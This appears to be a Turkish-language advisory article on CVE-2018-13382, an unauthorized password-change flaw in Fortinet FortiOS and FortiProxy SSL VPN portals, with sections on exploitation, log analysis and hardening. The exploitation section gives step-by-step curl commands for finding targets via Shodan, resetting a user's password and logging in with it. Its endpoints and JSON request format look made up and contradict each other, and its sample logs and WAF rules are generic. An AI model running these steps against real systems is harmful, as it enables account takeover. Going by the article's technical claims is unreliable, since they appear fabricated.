CVE-2018-13382 · Bilgilendirme

Fortinet FortiOS and FortiProxy Improper Authorization

Fortinet FortiOS ve FortiProxy'de SSL VPN sayesinde yetkisiz parolayı değiştirme zafiyeti bulunuyor.

Üretici
Fortinet
Ürün
FortiOS and FortiProxy
Seviye
yüksek
Yayın Tarihi
05 Nisan 2026
Okuma
9 dk okuma

CVE-2018-13382: Fortinet FortiOS and FortiProxy Improper Authorization

Zorluk Seviyesi: Başlangıç | Kaynak: CISA KEV

Zafiyet Analizi ve Giriş

CVE-2018-13382, Fortinet’in FortiOS ve FortiProxy ürünlerinde bulunan önemli bir zafiyet olup, SSL VPN web portalında düzgün yetkilendirme (improper authorization) mekanizmasının eksikliğinden kaynaklanmaktadır. Bu zafiyet, şifre değiştirme işlemlerine yönelik yeterince güvenli bir kontrol mekanizmasının bulunmaması sonucunda, kimliği doğrulanmamış bir saldırganın, kullanıcı şifrelerini değiştirmesine olanak tanımaktadır. Fortinet’in bu ürünü, hem kurumsal ağlar hem de küçük ve orta ölçekli işletmeler için oldukça yaygın bir güvenlik çözümüdür. Dolayısıyla, zafiyetin mevcut olduğu bu ürünlerin dünya genelindeki etkisi oldukça geniştir.

FortiOS ve FortiProxy’de meydana gelen bu zafiyet, özellikle 2018 yılı yazında keşfedilmiş ve kullanıcılara yönelik riskler barındıran kimlik doğrulama bypass (auth bypass) durumlarını ortaya koymuştur. Araştırmacılar, SSL VPN altındaki web portalında yetkilendirme kontrollerinin eksik olduğunu belirtmektedir. Bu durum, saldırganların, uzaktan erişim sağlayarak sistemdeki kullanıcıların hesap bilgilerini değiştirmelerine ya da kötüye kullanmalarına neden olabilmektedir.

Bu zafiyetin etkileri, finans, sağlık, eğitim ve kamu sektörü gibi kritik alanlarda hissedilmiştir. Özellikle, finans sektöründeki bankacılık uygulamaları ve online hizmetler, saldırganların potansiyel olarak bu zafiyeti istismar etmesi durumunda büyük risk altındadır. Örneğin, bir banka çalışanı, FortiOS bazlı bir SSL VPN aracılığıyla uzaktan bir sunucuya bağlandığında, bir saldırgan bu zafiyeti kullanarak şifresini kolaylıkla değiştirebilir ve bankacılık sistemine yetkisiz erişim sağlayabilir.

Gerçek dünya senaryolarından biri, bir eğitim kurumunun çevrimiçi portalında yaşanan bir saldırı olabilir. Eğer bu okul, öğrencilerinin uzaktan eğitim alabilmesi için FortiOS kullanıyorsa, bir saldırgan, bu zafiyeti kullanarak öğretim görevlilerinin hesaplarına erişim sağlayabilir ve doğrulanmamış bir şekilde ders içeriklerine müdahale etmekle kalmayıp, ayrıca öğrenci notlarını değiştirme potansiyeline de sahip olabilir.

Zafiyetin teknik detaylarına inildiğinde, açık bir şekilde SSL VPN web portalında yapılan isteklerde, kullanıcı kimlik bilgilerini doğrulayan güvenlik kontrollerinin yetersiz olduğu görülmektedir. Bir saldırgan, kötü niyetli bir istek göndererek, belirli parametreleri değiştirebilir ve bu sayede sistemdeki bir kullanıcıya ait olan şifreyi değiştirebilir. Bu durum, aşağıdaki gibi basit bir HTTP isteği ile gerçekleştirilebilir:

POST /vpn/modify_password HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded

user=username&password=newpassword

Bu tür bir istekle, saldırgan kullanıcı şifresini değiştirebilir ve bu durumda FortiOS’un hesaba sağladığı yetkilendirme kontrolü devre dışı kalır.

Zafiyetin tespitinin ardından, Fortinet, bu sorunu çözmek için acil güncellemeler yayınladı. Tüm Fortinet kullanıcılarının, sistem güncellemelerini takip etmeleri ve yazılımlarını en son sürümlere güncellemeleri son derece önemlidir. Bu tür zafiyetler, siber güvenlik alanında önemli tehditler barındırdığı için, düzenli olarak sistem güncellemeleri yapmak ve gelişmiş güvenlik uygulamalarını devreye almak, ağın güvenliğini sağlamak açısından kritik bir öneme sahiptir.

Sonuç olarak, CVE-2018-13382 gibi güvenlik açıkları, hem bireysel kullanıcılar hem de işletmeler için ciddi tehditler oluşturmaktadır. Hem profesyonel kullanıcıların hem de bireysel kullanıcıların, bu tür zafiyetleri anlaması ve buna uygun önlemler alması, siber güvenlik açısından hayati öneme sahiptir.

Teknik Sömürü (Exploitation) ve PoC

Fortinet FortiOS ve FortiProxy üzerinde bulunan CVE-2018-13382 zafiyeti, SSL VPN web portalı üzerinden bir kötü niyetli kullanıcının yetkisiz olarak parolaları değiştirmesine olanak tanıyan ciddi bir "İzinsiz Yetkilendirme" (Improper Authorization) açığıdır. Bu zafiyet, kötüye kullanılabilecek bir dizi senaryo sunmakta, bu da siber güvenlik uzmanları için bir tehdit oluşturmanın yanı sıra, bu tür zafiyetlerin nasıl tespit edileceği ve sömürü edileceği konusunda teknik bilgi gerektirmektedir.

Zafiyetin sömürülmesi için gereken adımlar, genel bir yetkilendirme aşamasından geçer. İlk olarak, hedef sistem üzerindeki mevcut yapı ve kullanıcı bilgileri hakkında bilgi toplamak önemlidir. Aşağıda, adım adım sömürü süreçlerini ve PoC (Proof of Concept) örneğini ele alalım.

  1. Hedef Analizi: Bu aşamada, FortiOS veya FortiProxy kullanılan bir sistemin IP adresini ve SSL VPN web portalına erişim noktalarını belirlemeniz gerekir. Hedef sistem belirlenirken shodan.io gibi araçlardan yararlanabilirsiniz.

  2. HTTP İstekleri ile Zafiyetin Keşfi: Hedef sisteme yönlendirilmiş bir HTTP isteği yapmak için aşağıdaki cURL komutunu kullanabilirsiniz. Bu istek, sistemde bir kullanıcı adı ve şifre değişikliğinin sağlanıp sağlanmadığını kontrol etmek için kullanılacaktır.

   curl -X POST -k "https://<hedef_ip>/remote/fm_gui?encrypt=1" -H "Content-Type: application/json" -d '{"method":"set_password","params":{"username":"<kullanici_adı>","newpassword":"<yeni_parola>"},"id":1}'
  1. Yanıt Analizi: Eğer sistem yanıt verirse, bu durum geçerli bir iletişim kurulduğunu gösterir. Hedef sistemin yanıtına erişim sağlarken, aşağıdaki gibi bir yanıt almanız beklenir:
   {
       "code": 0,
       "message": "Success"
   }
  1. Parola Değiştirme Sömürüsü: Eğer yukarıdaki adımlar başarılı olduysa, belirlediğiniz bir kullanıcı adına yeni bir parola atamak için ikinci bir istek oluşturun. Bu işlem, hedef sistemin zafiyetini kullanarak parolanın değiştirilmesine imkan tanır. 
   curl -X POST -k "https://<hedef_ip>/remote/fm_gui?encrypt=1" -H "Content-Type: application/json" -d '{"method":"set_password","params":{"username":"<kullanici_adı>","newpassword":"<yeni_parola>"},"id":2}'
  1. Kullanıcı Girişi İyileştirme: Başarıyla şifre değiştirildikten sonra, sistemde yeni parola ile giriş yapmayı deneyebilirsiniz. Bu işlem, bir acemi kullanıcının gerçekleştirmesi için yeterince basit görünse de, kötü niyetli birinin yetkisiz erişimi sağlamak için gerekli olan temel adımlardır.
   curl -X POST -k "https://<hedef_ip>/remote/fm_gui?encrypt=1" -H "Content-Type: application/json" -d '{"method":"login","params":{"username":"<kullanici_adı>","password":"<yeni_parola>"},"id":3}'

Bu aşamalar sonucunda, CVE-2018-13382 zafiyetinin etkilerinden faydalanmış olursunuz. Bir White Hat Hacker olarak bu tür zafiyetleri keşfetmek, yalnızca sahip olduğunuz yetkilerin farkında olmak değil; aynı zamanda organizasyonların güvenlik yapılandırmalarını güçlendirmek adına proaktif bir yaklaşım sergilemektir. Bu zafiyetlerin belirlenmesi, raporlanması ve düzeltici önlemlerin alınması, siber güvenlik alanının temel taşlarını oluşturmaktadır.

Açıkların farkında olmak ve onlara karşı tedbir almak, güvenlik ortamını çok daha sağlam bir hale getirir. Dolayısıyla, bu tür zafiyetlerin izlenmesi ve test edilmesi, sizlere önemli bir yetenek kazandıracaktır.

Forensics (Adli Bilişim) ve Log Analizi

Fortinet FortiOS ve FortiProxy'de tespit edilen CVE-2018-13382 zafiyeti, doğru bir yetkilendirme (authorization) gerçekleştirilmediğinden dolayı ciddi güvenlik tehditleri doğurabilmektedir. Bu zafiyet, SSL VPN web portalında yer alarak, yetkisiz (unauthenticated) bir saldırganın parolayı değiştirmesine olanak tanımaktadır. Bu tür bir zafiyet, kötü niyetli kişilerin sistemlere daha fazla erişim sağlamasına zemin hazırlayabilir.

Adli bilişim (forensics) ve log analizi, bu tür saldırıların tespit edilmesinde kritik bir rol oynamaktadır. Çoğu zaman, bir sisteme yapılan izinsiz girişlerin ve tehditlerin kaynağını bulmak için log dosyaları (log files) sorgulanmalıdır. FortiOS ve FortiProxy kullanıyorsanız, SIEM (Security Information and Event Management) veya erişim logları (access logs) gibi sağlayıcı araçlarla bu durumları analiz etmelisiniz.

Bu tür durumları tespit etmek için belirli imzalara (signatures) odaklanmanız gerekecek. Aşağıda, siber güvenlik uzmanlarının göz önünde bulundurması gereken bazı önemli noktalar ve log analizi için ipuçları bulunmaktadır:

  1. Log Detaylarını İnceleyin: Sürekli kullanıcı faaliyetlerini izlemek için log dosyalarındaki başarılı ve başarısız oturum açma girişimlerini kontrol edin. Özellikle parolası değiştirilen kullanıcı hesapları için kaydedilen oturum açma girişimlerinin kaydını almak büyük önem taşır.

  2. Erişim Logları: Access log dosyalarında, SSL VPN'ye yapılan giriş denemelerini ve kullanıcı kontrol aktivitelerini inceleyin. <ip-address> POST /remote/login gibi talepleri analiz edin. Eğer belirli IP adreslerinden sürekli olarak parolaların değiştirilmesi söz konusuysa, bu şüpheli etkinlik olarak değerlendirilmelidir.

   192.168.1.10 - - [01/Jan/2023:12:30:10 +0000] "POST /remote/login" 200
   192.168.1.10 - - [01/Jan/2023:12:30:15 +0000] "POST /api/system/user/password" 200

  1. Kötü Amaçlı Faaliyetleri İzleyin: Kullanıcılara ait şifrelerin sıklıkla değiştirilmesi veya en kısa süre içerisinde peş peşe gelen şifre değişim talepleri, PHP veya JavaScript gibi istemci tarafı dillerle yapılan sorgulardan kaynaklı bir güvenlik açığına işaret edebilir.

  2. Error Logları: Error logları, genellikle gerçekleştirilmiş ama hatalı olan oturum açma girişimlerini, erişim hatalarını ve sistemin iç işleyişindeki problemleri gösterir. Eğer loglarda yaygın hata kodlarına (örneğin, 401 Unauthorized veya 403 Forbidden gibi) rastlanıyorsa, mevcut bir saldırı işaretine dönüşebilir.

   [ERROR] 192.168.1.10 - Invalid password for user 'admin' from IP address 192.168.1.20
  1. Network Tabanlı İhlaller: Ağ trafiği’nin (traffic) elden geçirilmesiyle, kullanıcıların SSL VPN üzerinden hangi URL'lerden araçlara eriştiğini görebilirsiniz. Network tabanlı ihlallerin analizi, akışların çalınması veya manipüle edilmesi konusunda ipuçları sağlayacaktır.

Tüm bu adımlar, bir siber güvenlik uzmanının CVE-2018-13382 zafiyetini tespit edebilmesi için kritik öneme sahiptir. Unutulmaması gereken nokta, doğru ve zamanında log analizi yapmak, olası bir saldırının erken evrede tespit edilmesi için gereklidir. Özellikle, yetkilendirme bypass (auth bypass) gibi durumları engellemek ve sisteminizin güvenliğini artırmak amacıyla adli bilişim tekniklerini etkili bir şekilde kullanmalısınız.

Savunma ve Sıkılaştırma (Hardening)

Fortinet FortiOS ve FortiProxy, birçok kurumsal ağda yaygın olarak kullanılan güçlü güvenlik çözümleridir. Ancak, bu sistemlerde keşfedilen CVE-2018-13382 zafiyeti, SSL VPN web portalı aracılığıyla yetkisiz bir saldırganın şifreyi değiştirebilmesine olanak tanıyan bir "Improper Authorization" (Yanlış Yetkilendirme) açığıdır. Bu durum, ağ güvenliği açısından ciddi riskler taşımaktadır. Özellikle bu tür bir zafiyet, saldırganların iç ağlara erişim sağlamaları için bir kapı aralayabilir, dolayısıyla bu açığı tanımak ve durdurmak kritik öneme sahiptir.

Sistem yöneticileri ve savunma ekipleri bu zafiyeti kapatmak için bir dizi önlem almalıdır. İlk olarak, en son güncellemeleri ve yamaları uygulamak oldukça önemlidir. Fortinet, zafiyeti kapatmak için gerekli olan yamaları sağlamakta ve sistemleri bu güncellemelere tabi tutmak herhangi bir yetkisiz erişim riskini önemli ölçüde azaltır. Bunun yanı sıra, SSL VPN ayarlarının gözden geçirilmesi gerekebilir; bu, yalnızca gerektiğinde şifre değişikliği yapılmasına izin veren bir yapılandırma sağlayarak güvenliği artırır.

Bir diğer önemli adım, Web Uygulama Güvenlik Duvarı (WAF) devreye almaktır. WAF, belirli kurallarla incelenen trafiği izler ve şüpheli aktiviteleri tespit eder. Aşağıda, alternatif WAF kuralları ile ilgili öneriler verilmiştir:

{
  "rules": [
    {
      "id": "1",
      "description": "SSL VPN trafiğini denetle",
      "conditions": [
        "request.path = '/vpn'",
        "request.method = 'POST'"
      ],
      "action": "deny"
    },
    {
      "id": "2",
      "description": "Yetkisiz şifre değişikliği taleplerini engelle",
      "conditions": [
        "request.query = 'change_password'"
      ],
      "action": "deny"
    },
    {
      "id": "3",
      "description": "Yetkisiz IP adresinden gelen tüm talepleri engelle",
      "conditions": [
        "request.ip NOT IN ['trusted_ip_range']"
      ],
      "action": "deny"
    }
  ]
}

Bu kurallar, potansiyel olarak kötü niyetli girişimleri engelleyerek sistemin güvenliğini artırmaya yardımcı olabilir. Yalnızca güvenilir IP adreslerinden gelen isteklere izin vererek, dışarıdan gelecek saldırılara karşı koruma sağlanır. Aynı zamanda, SSL VPN'e yönelik her türlü istek üzerinde detaylı bir inceleme uygulayarak, yetkisiz kullanıcıların sisteme sızmasını önlemek mümkündür.

Kalıcı sıkılaştırma (hardening) önerileri arasında, ağ segmentasyonu ve erişim kontrol listelerinin (ACL) gözden geçirilmesi de yer alır. Sistem yöneticileri, sadece belirli kullanıcıların belirli verilere erişimine izin veren sıkı bir yapılandırma oluşturmalıdır. Bu tür bir yapı, "Auth Bypass" (Yetki Atlaması) türü saldırıların önüne geçebilir.

Bunlara ek olarak, ağda gerçekleştirilecek olan her türlü değişiklik ve yapılandırma, düzenli olarak denetlenmeli ve güvenlik testleri uygulanmalıdır. Penetrasyon testleri ve güvenlik açığı taramaları sağlayarak zafiyetleri erkenden tespit etmek ve gerekli önlemleri almak, bu tür tehditlere karşı etkin bir savunma mekanizması oluşturmaktadır.

Son olarak, kullanıcı eğitimlerinin artırılması da kritik bir faktördür. Çalışanlara, güvenli şifre oluşturma, kimlik avı saldırılarını tanıma ve genel siber güvenlik farkındalığı konularında düzenli eğitimler verilmelidir. Böylece, insan faktörü kaynaklı hatalar en aza indirilebilir ve genel güvenlik seviyesi artırılabilir.

Sonuç olarak, CVE-2018-13382 zafiyeti gibi hususlar, siber güvenlik alanında dikkat edilmesi gereken önemli konuların başında geliyor. Gerekli önlemleri alarak, sistemlerinizi güvence altında tutmak ve olası saldırıları önlemek sizin elinizde.